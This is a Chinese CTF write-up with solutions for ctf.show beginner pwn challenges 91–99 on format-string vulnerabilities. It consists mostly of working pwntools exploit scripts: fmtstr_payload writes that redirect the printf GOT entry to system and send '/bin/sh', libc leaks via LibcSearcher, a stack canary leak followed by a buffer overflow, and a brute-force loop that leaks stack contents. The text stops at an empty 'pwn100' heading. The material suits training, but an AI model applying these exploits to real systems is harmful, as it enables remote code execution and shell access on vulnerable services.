pwn入门（91~110）

四、格式化字符串

pwn91

from pwn import *

p = remote('pwn.challenge.ctf.show', 28126)
elf = ELF('../code/pwn')

daniu = 0x804B038
p.sendline(fmtstr_payload(7, {daniu:6}))

p.interactive()

pwn92

%s

pwn93

选7

pwn94

from pwn import *

p = remote('pwn.challenge.ctf.show', 28233)
elf = ELF('../code/pwn')

printf_got = elf.got['printf']

offset = 0x6
sys_addr = 0x8048400

payload = fmtstr_payload(offset, {printf_got:sys_addr})

p.sendline(payload)

p.send('/bin/sh\x00')

p.interactive()

pwn95

from pwn import *
from LibcSearcher3 import *

p = remote('pwn.challenge.ctf.show', 28235)
elf = ELF('../code/pwn')

printf_got = elf.got['printf']

payload = p32(printf_got) + b'%6$s'

p.send(payload)

printf_addr = u32(p.recvuntil('\xf7')[-4:])

libc = LibcSearcher('printf', printf_addr)

libcbase = printf_addr - libc.dump('printf')

sys_addr = libcbase + libc.dump('system')

payload2 = fmtstr_payload(6, {printf_got:sys_addr})

p.sendline(payload2)
p.send('/bin/sh\x00')

p.interactive()

pwn96

偏移为6

pwn97

from pwn import *
from LibcSearcher3 import *

p = remote('pwn.challenge.ctf.show', 28257)
elf = ELF('../code/pwn')

offset = 11
check = 0x804B040

payload = fmtstr_payload(offset, {check:1})

p.sendline(payload)

p.interactive()

pwn98

from pwn import *

p = remote('pwn.challenge.ctf.show', 28174)
elf = ELF('../code/pwn')

shell = elf.sym['__stack_check']

p.recv()
payload = '%15$x'
p.sendline(payload)
canary = int(p.recv(), 16)

payload2 = b'a' * 0x28 + p32(canary) + b'A' * 0xc + p32(shell)
p.sendline(payload2)

p.interactive()

pwm99

盲打，提示了flag在栈上，那就一个个爆破吧

from pwn import *
context.log_level = 'error'
def leak(payload):
	io = remote('pwn.challenge.ctf.show',28153)
	io.recv()
	io.sendline(payload)
	data = io.recvuntil('\n', drop=True)
	if data.startswith(b'0x'):
		print(p64(int(data, 16)))
	io.close()
i = 1
while 1:
	sleep(0.1)
	payload = '%{}$p'.format(i)
	leak(payload)
	i += 1

pwn100